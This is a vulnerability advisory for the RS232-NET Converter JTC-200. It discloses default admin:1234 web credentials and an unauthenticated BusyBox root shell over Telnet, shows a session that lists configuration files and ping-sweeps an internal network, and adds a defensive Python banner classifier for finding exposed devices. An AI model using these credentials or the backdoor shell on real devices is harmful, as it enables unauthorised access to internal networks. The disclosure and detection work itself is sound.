RS232-NET Converter (model JTC-200) – Multiple vulnerabilities
- CHTD, Chunghwa Telecom Co., Ltd. (Taiwan)
- HiNet (Taiwan & China)
- PT Comunicacoes (Portugal)
- Sony Network Taiwan Limited (Taiwan)
- Vodafone Portugal (Portugal)
The RS232-NET Converter (model JTC-200) web administration interface uses non-random default credentials of admin:1234. The application does not enforce a mandatory password change. A network-based attacker can gain privileged access to a vulnerable device’s web management interfaces or leverage default credentials in remote attacks such as cross-site request forgery.
The RS232-NET Converter (model JTC-200) provides an undocumented BusyBox Linux shell over its Telnet service, without any authentication. This backdoor shell therefore gives direct access to the internal network, over the Internet.
Connected to IP.
Escape character is '^]'.
BusyBox v0.60.4 (2008.02.21-16:59+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.
BusyBox v0.60.4 (2008.02.21-16:59+0000) multi-call binary
Usage: busybox [function] [arguments]...
or: [function] [arguments]...
BusyBox is a multi-call binary that combines many common Unix utilities into a single executable. Most people will create a link to busybox for each function they wish to use, and BusyBox will act like whatever it was invoked as.
Currently defined functions:
[, busybox, cat, cp, df, hostname, ifconfig, init, kill, killall, ls, mkdir, mknod, mount, msh, mv, ping, ps, pwd, rm, sh, test, touch, vi
bin dev etc nfs proc swap usb var
# cd etc
ConfigPage WRConfig.ini config inetd.conf inittab ppp protocols rc resolv.conf services
# cat inetd.conf
telnet stream tcp nowait root /bin/telnetd
192.168.5.x -> real ip
# for i in `cat ip-list`; do ping 192.168.5.$i; done
192.168.5.11 is alive!
No response from 192.168.5.12
No response from 192.168.5.13
192.168.5.14 is alive!
192.168.5.15 is alive!
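To find this exposure in your own asset inventory, the added example below (not part of the original advisory) classifies Telnet banners that have already been captured from devices you manage: a shell banner or bare prompt that appears before any login prompt marks the unauthenticated shell described above. The function names, host addresses and sample banners are constructed for illustration; only the BusyBox banner text is taken from the session shown on this page.

```python
import re

IAC, SE, SB = 255, 240, 250  # Telnet command bytes (RFC 854)
LOGIN_RE = re.compile(r"(login|username|password)\s*:", re.I)
SHELL_RE = re.compile(r"Built-in shell|^\s*[#$]\s*$", re.M)

def strip_telnet_negotiation(raw: bytes) -> str:
    """Remove IAC option negotiation, leaving only the text the server printed."""
    out, i = bytearray(), 0
    while i < len(raw):
        nxt = raw[i + 1] if i + 1 < len(raw) else None
        if raw[i] != IAC:
            out.append(raw[i]); i += 1
        elif nxt == IAC:                       # escaped literal 0xFF data byte
            out.append(IAC); i += 2
        elif nxt == SB:                        # subnegotiation runs to IAC SE
            end = raw.find(bytes([IAC, SE]), i + 2)
            i = len(raw) if end == -1 else end + 2
        elif nxt is not None and 251 <= nxt <= 254:  # WILL/WONT/DO/DONT + option
            i += 3
        else:                                  # other 2-byte command or truncated IAC
            i += 2
    return out.decode("latin-1")

def classify(raw: bytes) -> str:
    """Label a captured banner by what the service offers before any credentials."""
    text = strip_telnet_negotiation(raw)
    login, shell = LOGIN_RE.search(text), SHELL_RE.search(text)
    if shell and (login is None or shell.start() < login.start()):
        return "unauthenticated-shell"
    return "login-required" if login else "unknown"

def triage(banners: dict) -> list:
    """Return the hosts whose banner shows a shell with no login step."""
    return sorted(h for h, raw in banners.items()
                  if classify(raw) == "unauthenticated-shell")

# Constructed samples: documentation addresses, made-up negotiation bytes.
SAMPLES = {
    "192.0.2.10": b"\xff\xfd\x01\xff\xfb\x03\r\nBusyBox v0.60.4 (2008.02.21-16:59+0000) "
                  b"Built-in shell (msh)\r\nEnter 'help' for a list of built-in commands.\r\n\r\n# ",
    "192.0.2.11": b"\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\r\ngateway login: ",
    "192.0.2.12": b"SSH-2.0-ExampleServer\r\n",
}

if __name__ == "__main__":
    for host, raw in SAMPLES.items():
        print(host, classify(raw))
```

Any host returned by `triage` should have Telnet disabled or filtered at the network edge, since the web interface's default `admin:1234` password does not protect this service.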